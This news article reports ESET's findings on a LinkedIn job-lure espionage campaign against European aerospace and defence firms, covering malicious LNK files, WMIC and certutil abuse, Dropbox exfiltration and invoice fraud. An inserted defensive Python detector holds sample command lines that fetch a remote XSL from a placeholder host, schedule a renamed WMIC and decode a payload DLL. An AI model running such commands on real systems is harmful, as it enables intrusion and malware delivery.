June 18, 2020, updated 06 Jul 2022 5:59am

How Did These Social Engineering Attacks Trick Aerospace Blue Chips Into Opening the Doors for Hackers?

"Our company welcomes elites like you"

By Claudia Glover

European aerospace and military blue chips have been targeted by a sophisticated espionage campaign that involved the use of previously unseen malware, as well as social engineering, security firm ESET has revealed — after an investigation conducted alongside two of the affected firms.

The attackers took their first step to infiltrating the networks by luring employees in with the promise of a job from a rival business, then slipping malware into documents purportedly containing further information about roles. The attackers set up LinkedIn profiles masquerading as recruiters at major contractors Collins Aerospace and General Dynamics.

In a report released this week by Slovakia-headquartered ESET, the company said the attacks were launched between September and December 2019.

(To a casual observer, and particularly to a native English speaker, the LinkedIn overtures look deeply unconvincing and notably suspicious: “As you are a reliable elite, I will recommend you to our very important department”, reads one message. Viewing them is a reminder that social engineering attacks do not need to be polished to be hugely effective as a threat vector.)

The initial shared file did contain salary details, but it was a decoy.

“The shared file was a password-protected RAR archive containing a LNK file,” said ESET. “When opened, the LNK file started a Command Prompt that opened a remote PDF file in the target’s default browser.”

“In the background, the Command Prompt created a new folder and copied the WMI Commandline Utility (WMIC.exe) to this folder, renaming the utility in the process. Finally, it created a scheduled task, set to execute a remote XSL script periodically via the copied WMIC.exe.”

ESET has published IOCs on its GitHub repository.

Once in, the malware was significantly more sophisticated than the social engineering attempts: “The attackers used WMIC to interpret remote XSL scripts, certutil to decode base64-encoded downloaded payloads, and rundll32 and regsvr32 to run their custom malware,” ESET said.
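As an added example (not from the article or from ESET), the following Python walks constructed Sysmon-style process-creation records and flags the living-off-the-land patterns the article describes: a renamed copy of WMIC, WMIC pulling a stylesheet over HTTP, a scheduled task pointing at a binary in a user-writable folder, and certutil used as a decoder. Field names follow Sysmon Event ID 1; the sample records, user names, paths and hostname are made up.

```python
import re

# Constructed Sysmon Event ID 1 style records (made up for this example,
# not telemetry from the incident). Paths and the hostname are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": "wmic os get caption"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\svc\upd.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": 'upd.exe os get /format:"http://example.invalid/r.xsl"'},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r"schtasks /create /sc minute /mo 30 /tn Upd /tr C:\Users\alice\AppData\Local\Temp\svc\upd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -decode C:\Users\alice\AppData\Local\Temp\p.txt C:\Users\alice\AppData\Local\Temp\p.dll"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -verify cert.cer"},
]

# Directories an ordinary user can write to; a task action living here is suspicious.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.I)

def detect_lolbin_abuse(event):
    """Return the list of finding tags raised by one process-creation event."""
    findings = []
    image_name = event["Image"].rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    # Renamed WMIC: PE version info still says wmic.exe but the on-disk name differs.
    if original == "wmic.exe" and image_name != "wmic.exe":
        findings.append("renamed_wmic")
    # WMIC told to fetch and interpret a stylesheet from a web server.
    if original == "wmic.exe" and re.search(r"/format:\s*\"?https?://", cmd, re.I):
        findings.append("wmic_remote_xsl")
    # Scheduled task creation whose action lives in a user-writable directory.
    if original == "schtasks.exe" and "/create" in cmd.lower() and USER_WRITABLE.search(cmd):
        findings.append("schtask_user_writable_path")
    # certutil used as a base64/hex decoder rather than for certificate work.
    if original == "certutil.exe" and re.search(r"\s-decode(hex)?\b", cmd, re.I):
        findings.append("certutil_decode")
    return findings

def scan(events):
    """Map event index -> findings for every event that raised at least one tag."""
    return {i: f for i, e in enumerate(events) if (f := detect_lolbin_abuse(e))}

if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], "->", ", ".join(tags))
```

The renamed-binary check relies on the OriginalFileName field, so it only works where the sensor records PE version metadata rather than just the image path.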


Malware flow. Credit: ESET

Once in the system, the attackers were able to do two things. One was to look around for sensitive information, which they exfiltrated using custom-built, open source code that uploaded files to a Dropbox account.

The other was to harvest internal data to carry out further Business Email Compromise scams on staff across the company. Worryingly, the attackers also digitally signed some components of their malware, including a custom downloader and backdoor, and the dbxcli tool.

“The certificate was issued in October 2019 – while the attacks were active – to 16:20 Software, LLC.,” ESET noted.


Later in the campaign, the attackers also sought to monetise their access by finding unpaid invoices and attempting to exploit these.

“They followed up the conversation and urged the customer to pay the invoice, however, to a different bank account than previously agreed (see Figure 8), to which the customer responded with some inquiries.

“As part of this ruse, the attackers registered an identical domain name to that of the compromised company, but on a different top-level domain, and used an email associated with this fake domain for further communication with the targeted customer”.

This is where they were thwarted, however, as an alert customer checked in on a legitimate email address at the aerospace company to enquire about the shady request and the scam was flagged.

Ultimately, neither malware analysis nor the broader investigation allowed the post-incident response to “gain insight into what files the Operation In(ter)ception attackers were after”, ESET says: “However, the job titles of the employees targeted via LinkedIn suggest that the attackers were interested in technical and business-related information.”

It tentatively attributed the attack to the North Korean APT, Lazarus, saying “we have seen a variant of the Stage 1 malware that carried a sample of Win32/NukeSped.FX, which belongs to a malicious toolset that ESET attributes to the Lazarus group” but admitted it lacks compelling evidence.

Attackers going after high-value targets like this can be persistent, creative, and use some unusual techniques. Earlier this year a leading UK cybersecurity law enforcement officer warned CISOs that he was seeing a “much larger increase in physical breaches”, with cybercrime groups planting moles in cleaning agencies to gain hardware access.
